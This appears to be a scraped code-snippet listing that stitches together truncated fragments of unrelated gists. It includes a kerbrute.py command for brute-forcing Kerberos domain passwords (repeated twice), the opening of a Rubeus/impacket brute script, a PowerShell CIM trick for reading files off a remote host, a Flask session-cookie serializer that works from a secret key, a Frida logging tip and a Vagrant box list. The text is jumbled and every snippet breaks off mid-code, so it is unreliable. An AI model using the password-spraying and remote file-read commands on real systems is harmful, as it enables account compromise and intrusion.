With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/usr/bin/python3 | |
from __future__ import division | |
from __future__ import print_function | |
import re | |
import codecs | |
import logging | |
import time | |
import argparse | |
import sys | |
from impacket import version |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
For adding temporary logging to help understand behavior. For when it is impractical to use Frida to instrument Frida.
Choose one of these and copy-paste it into e.g. lib/interfaces/session.vala
,
then use log_event ("name='%s'", name);
to log.
When something appears to be hanging, try applying: x-async-debug.patch
.
$CimSession = New-CimSession -ComputerName 10.0.0.2 | |
$FilePath = 'C:\Windows\System32\notepad.exe' | |
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
$FileLengthBytes = $FileContents.FileData[0..3] | |
[Array]::Reverse($FileLengthBytes) |
#!/usr/bin/env python | |
from flask.sessions import SecureCookieSessionInterface | |
from itsdangerous import URLSafeTimedSerializer | |
class SimpleSecureCookieSessionInterface(SecureCookieSessionInterface): | |
# Override method | |
# Take secret_key instead of an instance of a Flask app | |
def get_signing_serializer(self, secret_key): | |
if not secret_key: | |
return None |
# Usage: IE={box} vagrant up | |
# | |
# Eg. IE=XPIE6 vagrant up | |
boxes = { | |
"XPIE6" => "http://aka.ms/vagrant-xp-ie6", | |
"XPIE8" => "http://aka.ms/vagrant-xp-ie8", | |
"VistaIE7" => "http://aka.ms/vagrant-vista-ie7", | |
"Win7IE8" => "http://aka.ms/vagrant-win7-ie8", | |
"Win7IE9" => "http://aka.ms/vagrant-win7-ie9", |